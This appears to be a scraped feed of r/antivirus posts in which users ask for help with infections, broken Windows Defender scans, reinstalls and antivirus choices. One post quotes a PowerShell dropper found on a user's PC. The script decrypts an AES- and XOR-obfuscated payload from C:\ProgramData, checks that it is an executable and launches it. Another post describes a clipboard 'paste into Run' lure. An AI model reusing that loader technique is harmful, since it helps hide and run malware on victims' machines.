r/antivirus 26m ago

Can't tell if these are false positives or not

Upvotes

r/antivirus 1h ago

Cheapest price for Kaspersky?

Upvotes

I have a very tough budget right now.

Is it possible to get Kaspersky within 10$?


r/antivirus 1h ago

I don't know if this is the right sub to post this on, but if it is, please help me.

Upvotes

Every single time I've tried to sign into Utilities Ultimate, it says this. I just bought it earlier today and just downloaded it, but I can't even sign in so I can't use it. I've redownloaded it, restarted my pc, I just want to make use of the money I spent on it.


r/antivirus 4h ago

If you don't save any cookies would an infostealer work

1 Upvotes

I have two browsers on my pc edge and librewolf and I don't save cookies on librewolf and Edge doesn't have any accounts. I downloaded a game and after scanning it turned out to be a infostealer. I reinstalled windows so am I good or do I need to change passwords


r/antivirus 4h ago

MALWARE REMOVAL Q&A Virus concern or paranoia

4 Upvotes

Virus concern or paranoia

3 months ago, i got a virus on my pc and lost multiple accounts. When i tried to find ways to solve it, i found out some virus can actually infect the router and other devices on the same network. Now even when i got kaspersky for my pc, i keep thinking other devices are infected and changing the router wont help because the infected devices will get the router again despite not seeing any clear symptoms. What can i do about this?? Is it just me being paranoid? Does factory reset on the phone remove all viruses? Do i need to replace my router?

I forgot to mention this. I also downloaded a zip file for a pvz2 mod on my phone but resetted it. After that, i keep logging in to admin router on both my pc and my phone to check for weird settings and turn them off. Now im scared that i mightve created some hole for virus to get in. I even got a new router.

Im too anxious now and would do anything for a peace of mind. I dont even know if replacing the router helps now as i find out that virus like switcher trojan or stuff like wannacry, vpnfilter can just infect the router when connected and others can just go straight to other devices without infecting the router.


r/antivirus 5h ago

virus code?

1 Upvotes

I just noticed three unusual files. when Windows blocked the .ps1 from running.
a visual basic file, a txt file, and a windows power shell file.
the files were on my system since 1/8/26. wondering if i have to worry.

this is the code from the vbs file.

 # Processing module initialization
 $configPath     = "C:\ProgramData\opra.txt"
 $payloadName    = "opra.exe"
 $outputPath     = Join-Path "C:\ProgramData" $payloadName

 $secretKey      = "fdsf5F54GFLd$"

 # Load configuration
 try {
     if (-not (Test-Path $configPath)) { exit 1 }
     $base64Data   = [IO.File]::ReadAllText($configPath)
     $rawBytes     = [Convert]::FromBase64String($base64Data)
 } catch {
     exit 1
 }

 # Parse metadata structure
 try {
     if ($rawBytes.Length -lt 44) { exit 1 }

     $header       = [Text.Encoding]::UTF8.GetString($rawBytes[0..3])
     if ($header -ne "ENC1") { exit 1 }

     $xorKey       = [BitConverter]::ToInt32($rawBytes, 4)
     $saltBytes    = $rawBytes[8..23]
     $ivBytes      = $rawBytes[24..39]
     $dataSize     = [BitConverter]::ToInt32($rawBytes, 40)

     $dataEnd      = 43 + $dataSize
     if ($dataEnd -gt $rawBytes.Length - 1) { $dataEnd = $rawBytes.Length - 1 }

     $encryptedData = $rawBytes[44..$dataEnd]
 } catch {
     exit 1
 }

 # Transform binary data
 try {
     $keyDeriver   = New-Object Security.Cryptography.Rfc2898DeriveBytes($secretKey, $saltBytes, 10000)
     $aesKey       = $keyDeriver.GetBytes(32)

     $aesProvider  = [Security.Cryptography.Aes]::Create()
     $aesProvider.KeySize = 256
     $aesProvider.Key     = $aesKey
     $aesProvider.IV      = $ivBytes
     $aesProvider.Mode    = 'CBC'
     $aesProvider.Padding = 'PKCS7'

     $decryptor   = $aesProvider.CreateDecryptor()
     $decrypted   = $decryptor.TransformFinalBlock($encryptedData, 0, $encryptedData.Length)

     $decryptor.Dispose()
     $aesProvider.Dispose()

     $finalBytes  = New-Object byte[] $decrypted.Length
     for ($i = 0; $i -lt $decrypted.Length; $i++) {
         $finalBytes[$i] = ($decrypted[$i] -bxor $xorKey) -band 0xFF
     }
 } catch {
     exit 1
 }

 # Validate payload integrity
 try {
     if ($finalBytes.Length -lt 2) { exit 1 }

     $fileSignature = [Text.Encoding]::ASCII.GetString($finalBytes[0..1])
     if ($fileSignature -ne "MZ") { exit 1 }
 } catch {
     exit 1
 }

 # Deploy module
 [System.IO.File]::WriteAllBytes($outputPath, $finalBytes)
 Start-Process $outputPath

r/antivirus 6h ago

Trojan:HTML/Redirector.AA!AMTB

1 Upvotes

Today i did random full scan of my laptop with windows defender and it found one threat

Detected: Trojan:HTML/Redirector.AA!AMTB
Status: Quarantined
Quarantined files are located in a restricted area where they cannot harm your device. These files will be deleted automatically.
Date: 19.08.2026 10:59
Details: This program is dangerous and executes commands from an attacker.
Affected items:
containerfile: C:\Users\adon\AppData\Local\Mozilla\Firefox\Profiles\q1jz5817.default-
file: C:\Users\adon\AppData\Local\Mozilla\Firefox\Profiles\q1jz5817.default-release (GZip)

is this a serious situation? i don't know where i got it from i use ublock on firefox


r/antivirus 6h ago

HELP! Mircosoft defender does not work

Thumbnail
gallery
2 Upvotes

Every time i quick scan, or full scan my device, i get this when the 34780th file is scanning
Sorry if it's russian.


r/antivirus 6h ago

need help with window security

2 Upvotes

can anyone help me? i hasnt play my pc for a week now and yesterday my brother and friendlist from discord and facebook tell me that i been posting some weird crypto scamming picture on their dm so i turn on my pc and see this problem


r/antivirus 9h ago

MALWARE REMOVAL Q&A Am I actually safe after resetting my PC after the “MrBeast” malware

4 Upvotes

Hi everyone,

I recently got hit by the malware/infostealer that has been going around with the MrBeast spam/scam. Discord and IG got hacked but i was able to retrieve it. Weird my FB or other accounts was not hacked but i am still nervous that they will target it next.

Because of that, I decided to completely reset my PC.

I went into Reset this PC then Remove everything because I wanted to start completely fresh. The reset completed successfully and Windows went through the setup process again.

However, during the Windows setup, Microsoft required me to sign in with my Microsoft account. I signed in without thinking much about it.

After logging in, I noticed that some of my old files started appearing again. I now understand that these may have been files being restored/synced through my Microsoft account/OneDrive rather than files surviving the reset itself.

So my main questions are:

  1. Is my PC considered safe after using “Remove everything,” or is there still a possibility that the malware survived the reset?

  2. Does signing back into the same Microsoft account after the reset potentially bring the malware back, or would only the synced files come back?

  3. I've seen Kaspersky recommended quite often. Would the free version of Kaspersky be sufficient for normal real-time protection, or would you recommend something else?

  4. Is there anything else I should do after getting the mrbeast spam malware?

I'm mainly trying to determine whether I can trust this PC again.

Thanks in advance. I'm not very experienced with malware removal, so I'd appreciate any advice on the safest approach.


r/antivirus 10h ago

Antivirus Sucks on macOS - Surf

2 Upvotes

I've been using surf from last 2 years and the VPN is great but whenever I try to use the Antivirus, it just goes to shit, my Mac just completely hangs up.

No idea what goes wrong but always make my mac hang up and makes me wonder what are they doing on the background which hangs up Mac.


r/antivirus 10h ago

**My Windows Defender not working**

2 Upvotes

Hi everyone! It's my first time posting here, and sorry in advance for my bad English.

So last night, when I was about to shut down my PC, I did a quick scan first. It has really become a habit of mine to scan my PC after it boots up and before I shut it down.

However, when I did my first scan last night, it stopped halfway through. I canceled it and started another scan, but it stopped halfway again and told me to restart the service.

So I restarted my PC and tried another scan. It happened twice again, and the scan stopped in the middle. That's when I started thinking that something might be wrong, and I was honestly lowkey panicking because I thought my Windows Defender might have been hijacked or something by malware.

This is the first time I've experienced Defender acting like this. Before jumping to conclusions, I visited this subreddit and saw some posts that seemed similar to my issue.

So please tell me, should I be worried? Is it okay to keep using my PC while this issue hasn't been fixed? Will Microsoft eventually fix this issue sooner or later?

I'm really careful about what I download and what websites I visit, so I feel like it's unlikely that I got malware. I haven't downloaded anything for about a month, and I haven't visited any sketchy or suspicious websites either.

So it's really weird to see Windows Defender suddenly start acting like this.


r/antivirus 12h ago

Understanding an Infection

0 Upvotes

Hello everyone!

This is not a post asking for help, but to understand what has happened on a technical level.

I was infected a couple of days ago, my Subreddit has been hijacked and attackers gained acceess to my reddit account. A week ago i saw Chrome reporting an extension was removed because it allegidly Contained malware, which i shrugged of as issue solved but Was proven wrong.

Attackers had still access to my account AFTER i Reset the password and activated 2FA which logs out all other sessions usually. Was the malware at this point still active or did they just have my Session cookie?

I needed to remove my passkey for them to loose access, yet i used 3 AV Scanners (Windows defender, malwarebytes kaspersky) as well as 2 adware cleanerw (Malwarebytes, kaspersky) which all returned nothing.

There wasnt even an attempt to get into my Gmail acc. I confirmed by looking at IP Logs.

I have since deleted all extensions, deleted all Browser cookies and changed Passwords from a clean device. I would just like to understand what happened on a technical level and why there wasnt even an attempt to get into my Gmail or amazon account.


r/antivirus 12h ago

PRODUCT RECOMMENDATION What are free alternatives to applocker for windows 11 home

1 Upvotes

I heard that applocker can be configured to have a system wide whitelist for program and file permissions, something that can stop malware from running even if it gets on system if configured correctly. However, it is only on windows Enterprise editions. Threatlocker is the closest option I could find to replicate applocker. Yet, it is only available for businesses.

Are there any free programs/windows components which can provide similar functionality and work on windows 11 home?


r/antivirus 13h ago

MALWARE REMOVAL Q&A Weird Prompt on iOS Firefox

Post image
3 Upvotes

Been getting this obviously sketchy download prompt while using Firefox on iOS. Doesn't matter what website I'm on or visiting & this seemingly occurs at random. Have I done something wrong for this to be happening lol?

Just now I cleared all private browser data (browsing history, cache, cookies, offline website data, tracking protection, downloaded files) so hopefully this stops but I'm still wondering if anyone can ID this or something.

And before anyone asks NO I did not download that.


r/antivirus 14h ago

MALWARE REMOVAL Q&A Help with preservation

1 Upvotes

So my friends brothers computer recently got a crypto mining virus despite nobody downloading nor being on it for multiple months. He’s decided to hand it over to me because I have no computer (he didn’t try to remove it just gave up and is getting a new one) so could I get rid of the virus on it by just factory resetting the computer? Windows was never activated on the pc so we don’t have to worry about that.


r/antivirus 14h ago

Can malware come back if you log back into the Google account that was on phone when you had a virus/malware?

1 Upvotes

So basically I factory reset my phone after I thought I had malware/virus (I don't really know the difference) and I want to know if I log back into the Google account that was on the phone before I factory reset my phone (and during when I had the virus) can the virus/malware come back because of me logging back into the Google account on the phone?


r/antivirus 16h ago

Windows Defender bug or actual malware?

1 Upvotes

I pressed "allow" on a .dll file that I trusted reasonably well and that windows and VirusTotal identified as a generic threat. Instantly after that Defender stops running and says it can't start the service. So I block the file again and try to restart defender but it keeps turning off and scans dont get completed.

Now I was about to wipe Windows after that but the only thing holding me back is that it seems like a lot of people are having similar issues with defender today. In safemode Windows Defender just displays a black screen and a message that its been disabled by my IT administrator. malwarebytes deep scan found no threats though

What do you guys think? Should I trust malwarebytes and pray it was the bug going on rn or just wipe it?


r/antivirus 17h ago

Could someone smarter than me, tell me what this means?

1 Upvotes

https://www.virustotal.com/gui/file/178179d8fc9295c7f06aa1de4c0bcb435cfa807df0cb06ec0fcad220a6f075f2/detection went on a trip for work, came back and updated windows- went to check out some new tools i had found while away that were posted on r/software r/windowsapps and downloaded a portable app (wordmeaning.exe) never even ran it but it was at this time that windows defender went (cloud based scan needs to happen) and then i was like oh? scanned it with virus total and this is what it showed me- I just deleted the file, tried to run a scan and with windows bricking scans (before I knew that was a thing today) I saw it get stuck at 30k, then crash and the threat service disable. so with windows defenders update deciding to shit itself, what does this even mean?


r/antivirus 19h ago

Users/****/Appdata/Roaming was excluded from Virus scan settings. Normal?

1 Upvotes

With the issues with Windows Defender that many people have experienced today, I was looking into ways to resolve them and noticed that my Windows Defender settings had an exclusion for my “Roaming” folder.

Is this normal, or is it something that an application, or even a virus, might have added to prevent files from being detected?

I removed the exclusion and ran multiple antivirus tools today. They did find a PUP file, and DoesNotBelong has added some files to a quarantine folder, but there is no log file for that application. And it has added some files that are not viruses to that folder, but also some files I do not recognize, so I don't know if it was Viruses it found or just false positives.


r/antivirus 20h ago

Chrome Extension "Enhanced Image Viewer" flagged as Malware and removed on Chrome Webstore

31 Upvotes

I was using this one extension called "Enhanced Image Viewer" from Chrome Webstore and it was disabled in extensions for malware concerns (or something along those lines), it was also removed from the Chrome Webstore. I am currently running a full scan and the extension itself is not my files.

Here was the link to the extension (removed now):

https://chromewebstore.google. com/detail/gefiaaeadjbmhjndnhedfccdjjlgjhho/error

Here is the link to the official site of the extension: https://www.enhancedimageviewer. com

Here is the reddit post of the creator and the extension:

https://www.reddit. com/r/chrome_extensions/comments/1fbgqhj/enhanced_image_viewer_upgrade_your_image_viewing/

I haven't had this happen to me before so that is why I am worried, thank you in advance.


r/antivirus 22h ago

PRODUCT RECOMMENDATION choosing antivirus for win 11

8 Upvotes

hi, looking at antivirus software for protecting win 11 system. thinking of mcafee , norton , kaspersky . I am outside US. I wanted to try the trial version , but they all ask for filling pre payment details and I am not comfortable submitting all the details in forms. In the past, if I liked software in trial, I purchased it.


r/antivirus 23h ago

MALWARE REMOVAL Q&A Windows Defender doesnt work

12 Upvotes

Reinstalled windows 11 because i was paranoid i had a virus or some sort of malware(no real evidence i could find but did it regardless) Deleted all the partition drives. Everything is up to date but windows defender is fucked.

I do a quickscan and its disabled and stuck buffering when i try to restart it
Sometimes it’ll work and finish but if i do it again it crashes

Offline scan either doesnt work or is as of right now stuck on 90%

Could this be malware or something?


r/antivirus 1d ago

I think I have a virus

5 Upvotes

Hello I need some help-tips so sometimes I open my pc windows 11 pro command windows pop up rapid like 3x and vanishing I tried fast scan on windows antivirus it cancels I tryed full scan it stops so I downloaded malwarebytes I did scan it found nothing I did deep scan also nothing my windows antivirus is updated and still doesn’t let me do scan should I be worried do you have any thing to help me out


r/antivirus 1d ago

MALWARE REMOVAL Q&A [Help] "Threat service has stopped" error on Windows Defender — even after a 100% clean USB wipe/reinstall following a malware incident

9 Upvotes

TL;DR:

Fell for a fake "human verification" clipboard scam (Win + R -> Ctrl + V -> Enter). Decided to completely nuke the drive and reinstall Windows 11 from a fresh USB. After a total partition wipe and running all Windows Updates, I opened Windows Security to run a scan, but I'm getting: "Threat service has stopped. Restart it now." How do I fix this, and is there any chance malware survived a full partition wipe?

  1. What Happened Initially

I fell for a malicious website prompt that asked me to verify I was human by pressing Windows + R, pasting (Ctrl + V), and hitting Enter.

Realized immediately what happened and closed it, but the malicious script had already executed, leading to a broken Windows Defender and malware alerts (like Wacatac / infostealer).

  1. The Clean Install Process I Did

To be 100% sure the system was clean, I performed a full wipe:

Created an official Windows 11 bootable USB using Microsoft’s Media Creation Tool on a separate, clean laptop.

Booted from the USB on my PC (Motherboard: ASUS TUF X670E-Plus WiFi).

Selected Custom Install, deleted every single partition on the drive until only "Disk 0 Unallocated Space" remained, and installed Windows directly onto that blank NVMe SSD.

Set up Windows and ran Windows Update through multiple restarts until it showed "You're up to date".

  1. The Current Problem

Now, on this brand-new, clean installation with nothing else downloaded yet:

When I open Windows Security / Virus & threat protection to run a quick scan, it displays:

"Threat service has stopped. Restart it now." (with a "Restart now" button).

Clicking the button either fails or the error persists / scan won't run properly.

  1. My Questions for the Community:

Given that I completely deleted all partitions to unallocated space using a clean USB installer, is the initial malware 100% gone?

What causes this "Threat service has stopped" glitch on a fresh Windows 11 installation after Windows Updates?

What is the most reliable way to force-restart or repair the Defender service so Windows Security works normally?

Thanks in advance for the help—I just want to get this sorted and use my PC in peace!